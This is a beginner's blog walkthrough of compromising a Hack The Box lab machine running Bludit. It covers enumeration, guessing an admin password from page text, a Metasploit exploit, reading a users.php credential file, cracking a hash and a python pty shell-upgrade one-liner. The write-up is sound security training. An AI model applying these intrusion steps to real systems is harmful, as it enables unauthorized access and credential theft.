This is the first machine I’ve done on HTB. I’ve been sticking to the challenges for awhile, because I wanted to get a bit better before I moved forward. I figured the easiest machine with the most solves would be a good start, lol.
Also, this is the first time I’ve used Parrot and I am finding that I really like it!
I started off by enumerating the machine with an nmap scan:
Looks like we have a closed FTP connection and a web server. I’m going to check out the web page.
Hmm, looks like a webpage for someone to dump random info they want to save:
Most of the links are broken and go nowhere, except the “1996” one that gives you facts about historical computer events.
I started gobuster and got an admin page (it’s still running, so this isn’t a complete scan yet).
Let’s explore that:
So I need a username here. Back on the first page, I remember seeing something that looked weird as I read through everything.
This person obviously loves Roland Deschain since they are saying he is the BEST fictional character in the series. Maybe they are using it as a username or password? Also, the way it is pushed together could be just a typo, but it could also be a hint?
I tried getting into the admin login using RolandDeschain as the username, utilizing random stuff I found on the page as potential passwords, but failed. I didn’t want to waste too much time doing it by hand, so I stored Roland in my memory and moved on.
I started looking for some type of exploit. There is indeed an exploit for that admin page:
We get some Metasploit instructions by checking out the rapid7 link. And I KNOW that Metasploit use is sometimes frowned upon within the HTB community, but…just let me live my life.
I will need a username and password before I attempt this exploit:
At this point I checked on gobuster and it was complete:
After making my way to the interesting looking /todo.txt directory, I see it mentions a guy named Fergus:
So we now have a user. I headed back to the admin page and considered using hydra or something similar to bruteforce the password, but eventually tried out that name combo on the front page that looked suspicious, RolandDeschain.
This granted me access to the admin dashboard:
I also set the user as “fergus” back at our exploit:
And then our password:
Now if I HADN’T used RolandDeschain first? I think I would have been in for some long-winded bruteforcing, so I consider myself very lucky here. I don’t even know what word list that would be in?
After some thought, I think the strategy would have been to make a custom word list with the content of the webpage. I know of a tool called CeWL which can do that. It’s preinstalled on Kali.
Anyways, let’s keep working on our exploit. I set the RHOST (target ip):
Time for the moment of truth…
Nice.
From here I made my way to a user named Hugo who has the user.txt file. However, I do not have the correct permissions to read it:
After exploring around the file system for quite some time, I managed to find something at:
/var/www/bludit-3.10.0a/bl-content/databases/users.php
Here we have a password hash for Hugo. For this I just used CrackStation, which made quick work of it.
So now we have Hugo’s password, Password120.
I changed users and made my way back to the user.txt file:
At this point I got stuck because of the limitations of the shell I was using. As I was trying to progress, I kept getting the “sudo: no tty present and no askpass program specified” error.
After some research, I found THIS BLOG, which helped me fix my situation with this:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
At this point, almost in the throes of my first root victory, my Meterpreter session died…
I started from the top fresh, which was good, because I could take a better screenshot of the process without the 300 errors and missteps.
So this was DEFINITELY a learning experience. I spent basically an entire day on what was supposed to be an easy box. I still had a lot of fun though, and can’t wait to try more.
Oh, and I graduated to Script Kiddie when I solved this!
Happy Hacking! ❤
